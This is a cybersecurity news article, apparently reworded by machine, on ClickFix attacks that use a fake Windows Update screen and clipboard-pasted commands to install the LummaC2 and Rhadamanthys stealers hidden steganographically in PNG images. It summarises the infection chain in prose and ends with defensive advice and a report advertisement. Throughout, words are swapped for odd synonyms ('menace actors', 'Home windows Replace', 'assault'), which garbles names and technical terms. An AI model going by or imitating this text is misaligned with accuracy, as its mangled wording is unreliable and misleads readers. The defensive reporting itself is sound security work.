ClickFix assault variants have been noticed the place menace actors trick customers with a realistic-looking Home windows Replace animation in a full-screen browser web page and conceal the malicious code inside photos.
ClickFix is a social-engineering assault the place customers are satisfied to paste and execute in Home windows Command Immediate code or instructions that result in operating malware on the system.
The assault has been extensively adopted by cybercriminals throughout all tiers resulting from its excessive effectiveness and has regularly developed, with more and more superior and misleading lures.
Fullscreen browser web page
Since October 1st, researchers have noticed ClickFix assaults the place the pretense for executing harmful instructions was finishing the set up of a essential Home windows safety replace and the extra frequent “human verification” lure [1, 2].
The pretend replace web page instructs victims to press particular keys in a sure sequence, which pastes and executes instructions from the attacker that had been mechanically copied to the clipboard by way of JavaScript operating on the positioning.
Supply: BleepingComputer
A report from managed safety providers supplier Huntress notes that the brand new ClickFix variants drop the LummaC2 and Rhadamanthys data stealers.
In a single variant, the hackers use a human verification web page, whereas in one other they depend on the pretend Home windows Replace display screen.
In each instances, although, the menace actors used steganography to encode the ultimate malware payload inside a picture.
“Moderately than merely appending malicious knowledge to a file, the malicious code is encoded straight inside the pixel knowledge of PNG photos, counting on particular color channels to reconstruct and decrypt the payload in reminiscence,” Huntress researchers clarify.
Delivering the ultimate payload begins with utilizing the mshta Home windows-native binary to execute malicious JavaScript code.
Your complete course of entails a number of levels that use PowerShell code and a .NET meeting (the Stego Loader) chargeable for reconstructing the ultimate payload embedded inside a PNG file in an encrypted state.
Inside Stego Loader’s manifest assets, there’s an AES-encrypted blob that’s truly a steganographic PNG file containing shellcode that’s reconstructed utilizing customized C# code.
Huntress researchers seen that the menace actor used a dynamic evasion tactic, generally known as ctrampoline, the place the entry level perform began calling 10,000 empty features.
Supply: Huntress
The shellcode holding the infostealer samples is extracted from the encrypted picture and is packed utilizing the Donut instrument that enables executing VBScript, JScript, EXE, DLL recordsdata, and .NET assemblies in reminiscence.
After unpacking, Huntress researchers had been capable of retrieve the malware, which within the analyzed assaults was LummaC2 and Rhadamanthys.
The diagram under serves as a visible illustration of how the complete assault works:
Supply: Huntress
The Rhadamanthys variant that used the Home windows Replace lure was first noticed by researchers again in October, earlier than Operation Endgame took down components of its infrastructure on November 13.
Huntress reviews that the legislation enforcement operation resulted within the payload not being delivered anymore on the pretend Home windows Replace domains, that are nonetheless energetic.
To remain protected from this sort of ClickFix assaults, the researchers advocate disabling the Home windows Run field and monitoring for suspicious course of chains comparable to explorer.exe spawning mshta.exe or PowerShell.
Moreover, when investigating a cybersecurity incident, analysts can verify the RunMRU registry key to see if the person entered instructions within the Home windows Run field.
It is finances season! Over 300 CISOs and safety leaders have shared how they’re planning, spending, and prioritizing for the yr forward. This report compiles their insights, permitting readers to benchmark methods, establish rising traits, and evaluate their priorities as they head into 2026.
Learn the way high leaders are turning funding into measurable affect.
